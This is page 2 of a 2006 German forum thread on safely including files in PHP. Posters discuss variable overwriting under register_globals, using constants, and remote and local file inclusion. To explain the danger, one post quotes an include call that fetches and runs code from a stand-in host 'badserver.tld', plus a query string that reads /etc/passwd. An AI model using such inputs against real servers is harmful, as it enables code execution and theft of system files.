AGB  ·  Datenschutz  ·  Impressum  







Anmelden
Nützliche Links
Registrieren
Thema durchsuchen
Ansicht
Themen-Optionen

[PHP] - Sicheres Includen

Ein Thema von fwsp · begonnen am 14. Aug 2006 · letzter Beitrag vom 16. Aug 2006
Antwort Antwort
Seite 2 von 2     12   
Benutzerbild von alcaeus
alcaeus

Registriert seit: 11. Aug 2003
Ort: München
6.537 Beiträge
 
#11

Re: [PHP] - Sicheres Includen

  Alt 14. Aug 2006, 17:21
Zitat von faux:
alcaeus, was genau verstehst du unter RFI?
Meine eigene Abkuerzung fuer Remote-File-Inclusion. Ich bin zu faul das auszuschreiben

Greetz
alcaeus
Andreas B.
Die Mutter der Dummen ist immer schwanger.
Ein Portal für Informatik-Studenten: www.infler.de
  Mit Zitat antworten Zitat
generic

Registriert seit: 24. Mär 2004
Ort: bei Hannover
2.416 Beiträge
 
Delphi XE5 Professional
 
#12

Re: [PHP] - Sicheres Includen

  Alt 15. Aug 2006, 17:05
$_SERVER['DOCUMENT_ROOT']
^ ist ein array welches überschrieben werden kann.

$Sec.$Site;
^ sind variablen welche überschrieben werden können.

besonders gefährlich im zusammenhang mit register_globals on!

nimm eine constante also etwas was mit define definiert wird - einmalig.
Coding BOTT - Video Tutorials rund um das Programmieren - https://www.youtube.com/@codingbott
  Mit Zitat antworten Zitat
omata

Registriert seit: 26. Aug 2004
Ort: Nebel auf Amrum
3.154 Beiträge
 
Delphi 7 Enterprise
 
#13

Re: [PHP] - Sicheres Includen

  Alt 15. Aug 2006, 19:48
Mal ein ganz anderer Ansatz...

Wenn man HTML und PHP Code nicht mischt sondern alles in PHP codet. Das heisst es gibt keine echos oder sonstige Ausgaben in den includeten Dateien und man schreibt alles objectorientiert, dann kann man ruhig eine dieser Dateien aufrufen. Im Browser kommt dann nur noch eine leere Seite an.

In meinen PHP-Anwendungen gibt es so nur eine echo-Zeile, am Ende und im Hauptscript.

Gruss
Thorsten
  Mit Zitat antworten Zitat
Benutzerbild von alcaeus
alcaeus

Registriert seit: 11. Aug 2003
Ort: München
6.537 Beiträge
 
#14

Re: [PHP] - Sicheres Includen

  Alt 16. Aug 2006, 13:05
Zitat von omata:
Wenn man HTML und PHP Code nicht mischt sondern alles in PHP codet. Das heisst es gibt keine echos oder sonstige Ausgaben in den includeten Dateien und man schreibt alles objectorientiert, dann kann man ruhig eine dieser Dateien aufrufen. Im Browser kommt dann nur noch eine leere Seite an.
Das ist ja nicht das Problem. Das Problem ist, dass du alles moegliche includen kannst. Nehmen wir mal sowas:
Code:
include('http://badserver.tld/badscript.txt');
Der Code ladet bei aktivem allow_url_fopen den Inhalt von badscript.txt und fuehrt ihn anschliessend aus. Das ist...suboptimal.

Ein weiteres Problem:
Code:
mypage.php?include=/etc/passwd
Bei einem nicht optimal konfigurierten Server (und das kommt leider oefter vor als man glauben will) kannst du dir vorstellen was da passiert...

Greetz
alcaeus
Andreas B.
Die Mutter der Dummen ist immer schwanger.
Ein Portal für Informatik-Studenten: www.infler.de
  Mit Zitat antworten Zitat
Antwort Antwort
Seite 2 von 2     12   


Forumregeln

Es ist dir nicht erlaubt, neue Themen zu verfassen.
Es ist dir nicht erlaubt, auf Beiträge zu antworten.
Es ist dir nicht erlaubt, Anhänge hochzuladen.
Es ist dir nicht erlaubt, deine Beiträge zu bearbeiten.

BB-Code ist an.
Smileys sind an.
[IMG] Code ist an.
HTML-Code ist aus.
Trackbacks are an
Pingbacks are an
Refbacks are aus

Gehe zu:

Impressum · AGB · Datenschutz · Nach oben
Alle Zeitangaben in WEZ +1. Es ist jetzt 10:20 Uhr.
Powered by vBulletin® Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
LinkBacks Enabled by vBSEO © 2011, Crawlability, Inc.
Delphi-PRAXiS (c) 2002 - 2023 by Daniel R. Wolf, 2024 by Thomas Breitkreuz